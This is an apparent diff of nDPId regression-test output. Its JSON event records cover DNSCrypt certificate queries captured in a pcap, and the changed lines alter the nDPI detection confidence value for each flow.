01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":946739305327,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739305327,"pkt":"REREREREZmZmZmZmCABFAAIcwI1AAL0RNQwKAAABlXBwCsNzIPsCCMhQbAABAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVxdWFkOQNuZXQAABAAAQAAAAAAAAAAAAHKAAwBxgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":50035,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":50035,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":145,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":40009,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":946739305327,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739305327,"pkt":"REREREREZmZmZmZmCABFAAXcwI4gAL0RUUsKAAABlXBwCpxJIPsGBPr0a\/0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVxdWFkOQNuZXQAABAAAQAAAAAAAAAAAAXGAAwFwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":40009,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":40009,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":146,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739305327} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":146,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739305327,"pkt":"REREREREZmZmZmZmCABFAABQwI4Aub0Rdh4KAAABlXBwCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":147,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":56022,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":946739305327,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739305327,"pkt":"REREREREZmZmZmZmCABFAAXcwI8gAL0RUUoKAAABlXBwCtrWIPsGBLxpa\/sBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVxdWFkOQNuZXQAABAAAQAAAAAAAAAAAAXGAAwFwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":56022,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":56022,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":148,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739305327} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":148,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739305327,"pkt":"REREREREZmZmZmZmCABFAABQwI8Aub0Rdh0KAAABlXBwCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":149,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":42570,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":946739305327,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739305327,"pkt":"REREREREZmZmZmZmCABFAAXcwJEgAL0RUUgKAAABlXBwCqZKIPsGBPDxa\/8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVxdWFkOQNuZXQAABAAAQAAAAAAAAAAAAXGAAwFwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":42570,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":42570,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":150,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":57465,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":946739305327,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739305327,"pkt":"REREREREZmZmZmZmCABFAAIcwJBAAL0RNQkKAAABlXBwCuB5IPsCCMhQa\/4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVxdWFkOQNuZXQAABAAAQAAAAAAAAAAAAHKAAwBxgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":57465,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":57465,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":151,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739305327} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":151,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739305327,"pkt":"REREREREZmZmZmZmCABFAABQwJEAub0RdhsKAAABlXBwCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 